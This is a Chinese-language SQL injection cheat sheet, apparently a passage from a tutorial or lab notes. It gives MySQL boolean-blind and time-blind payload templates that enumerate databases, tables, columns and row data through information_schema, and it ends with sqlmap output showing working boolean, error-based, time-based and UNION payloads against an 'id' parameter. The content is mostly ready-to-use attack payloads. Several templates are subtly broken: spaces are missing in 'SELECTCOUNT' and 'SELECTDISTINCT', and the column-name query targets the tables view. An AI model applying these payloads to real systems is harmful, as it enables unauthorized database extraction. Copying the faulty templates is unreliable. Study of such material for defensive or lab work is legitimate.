#判断指定库中表的个数 #n为猜测的数据表个数,base_h为指定库的hex编码 ... AND ((SELECTCOUNT(DISTINCT+table_name)FROM information_schema.tables WHERE table_schema= base_h)>n);
#判断表名长度 #x为数据表偏移量,l为猜测表名长度,base_h为指定库的hex编码 ... AND (LENGTH((SELECTDISTINCT table_name FROM information_schema.tables WHERE table_schema=base_h LIMIT x,1))>l);
#判断表名字符 #x为数据表偏移量,y为名称字符串偏移量,c为猜测的ASCII码值,base_h为指定库的hex编码 ... AND (SELECT ASCII(SUBSTR((SELECTDISTINCT table_name FROM information_schema.tables WHERE table_schema=base_h LIMIT x,1),y,1))>c);
判断列。
#判断指定表中列的个数 #n为猜测的列的个数,base_h为指定库的hex编码,table_h为指定表的hex编码 ... AND ((SELECTCOUNT(DISTINCT+column_name)FROM information_schema.columns WHERE table_name=table_h AND table_schema= base_h)>n);
#判断列名长度 #x为列偏移量,l为猜测列名长度,base_h为指定库的hex编码,table_h为指定表的hex编码 ... AND (LENGTH((SELECTDISTINCT column_name FROM information_schema.columns WHERE table_name=table_h AND table_schema=base_h LIMIT x,1))>l);
#判断列名字符 #x为列偏移量,y为名称字符串偏移量,c为猜测的ASCII码值,base_h为指定库的hex编码,table_h为指定表的hex编码 ... AND (SELECT ASCII(SUBSTR((SELECTDISTINCT table_name FROM information_schema.tables WHERE table_name=table_h AND table_schema=base_h LIMIT x,1),y,1))>c);
判断数据。
#判断数据表中数据个数 #n为猜测的数据个数,base_n为数据库名,table_n为数据表名 ... AND ((SELECTCOUNT(*) FROM base_n.table_n)>n);
#判断字段长度 #x为字段偏移量,l为猜测字段长度,base_n为数据库名,table_n为数据表名,column_n为列名 ... AND (LENGTH((SELECT column_n FROM base_n.table_n LIMIT x,1))>l);
#判断字段字符 #x为字段偏移量,y为名称字符串偏移量,c为猜测的ASCII码值,base_n为数据库名,table_n为数据表名,column_n为列名 ... AND (SELECT ASCII(SUBSTR((SELECT column_n FROM base_n.table_n LIMIT x,1),y,1))>c);
IF(CONDITION, TRUE, FALSE) 如果条件CONDITION为真,则返回TRUE对应的表达式;否则返回FALSE对应的表达式。
步骤
寻找注入点,判断注入类型。
判断数据库。
#判断数据库个数 #n为猜测的数据库个数 ... AND IF((SELECTCOUNT(DISTINCT+table_schema)FROM information_schema.tables)>n,SLEEP(5),1);
#当前数据库名称 #c为猜测的ASCII码值,y为名称字符串偏移量 ... AND IF((SELECT ASCII(substr((SELECT database()),y,1))>c),SLEEP(5),1);
#所有数据库名称 #x为数据库偏移量,c为猜测的ASCII码值,y为库名偏移量 ... AND IF((SELECT ASCII(SUBSTR((SELECTDISTINCT table_schema FROM information_schema.tables LIMIT x,1),y,1))>c),SLEEP(5),1);
判断数据表。
#判断指定库中表的个数 #n为猜测的数据表个数,base_h为指定库的hex编码 ... AND IF(((SELECTCOUNT(DISTINCT+table_name)FROM information_schema.tables WHERE table_schema= base_h)>n),SLEEP(5),1);
#判断表名长度 #x为数据表偏移量,l为猜测表名长度,base_h为指定库的hex编码 ... AND IF((LENGTH((SELECTDISTINCT table_name FROM information_schema.tables WHERE table_schema=base_h LIMIT x,1))>l),SLEEP(5),1);
#判断表名字符 #x为数据表偏移量,y为名称字符串偏移量,c为猜测的ASCII码值,base_h为指定库的hex编码 ... AND IF((SELECT ASCII(SUBSTR((SELECTDISTINCT table_name FROM information_schema.tables WHERE table_schema=base_h LIMIT x,1),y,1))>c),SLEEP(5),1);
判断列。
#判断指定表中列的个数 #n为猜测的列的个数,base_h为指定库的hex编码,table_h为指定表的hex编码 ... AND IF(((SELECTCOUNT(DISTINCT+column_name)FROM information_schema.columns WHERE table_name=table_h AND table_schema= base_h)>n),SLEEP(5),1);
#判断列名长度 #x为列偏移量,l为猜测列名长度,base_h为指定库的hex编码,table_h为指定表的hex编码 ... AND IF((LENGTH((SELECTDISTINCT column_name FROM information_schema.columns WHERE table_name=table_h AND table_schema=base_h LIMIT x,1))>l),SLEEP(5),1);
#判断列名字符 #x为列偏移量,y为名称字符串偏移量,c为猜测的ASCII码值,base_h为指定库的hex编码,table_h为指定表的hex编码 ... AND IF((SELECT ASCII(SUBSTR((SELECTDISTINCT table_name FROM information_schema.tables WHERE table_name=table_h AND table_schema=base_h LIMIT x,1),y,1))>c),SLEEP(5),1);
判断数据。
#判断数据表中数据个数 #n为猜测的数据个数,base_n为数据库名,table_n为数据表名 ... AND IF(((SELECTCOUNT(*) FROM base_n.table_n)>n),SLEEP(5),1);
#判断字段长度 #x为字段偏移量,l为猜测字段长度,base_n为数据库名,table_n为数据表名,column_n为列名 ... AND IF((LENGTH((SELECT column_n FROM base_n.table_n LIMIT x,1))>l),SLEEP(5),1);
#判断字段字符 #x为字段偏移量,y为名称字符串偏移量,c为猜测的ASCII码值,base_n为数据库名,table_n为数据表名,column_n为列名 ... AND IF((SELECT ASCII(SUBSTR((SELECT column_n FROM base_n.table_n LIMIT x,1),y,1))>c),SLEEP(5),1);
#输出 sqlmap resumed the following injection point(s) from stored session: --- Parameter: id (GET) #布尔盲注 Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: id=1' OR NOT 4938=4938#&Submit=Submit #报错注入 Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: id=1' AND GTID_SUBSET(CONCAT(0x71626b7671,(SELECT (ELT(2858=2858,1))),0x71627a7071),2858)-- qDrZ&Submit=Submit
#时间盲注 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=1' AND (SELECT 9237 FROM (SELECT(SLEEP(5)))RCwq)-- pggr&Submit=Submit #联合注入 Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626b7671,0x6b786657706745717a444d55656a69786e70704f4143586874496741624c4444454350617159755a,0x71627a7071)#&Submit=Submit ---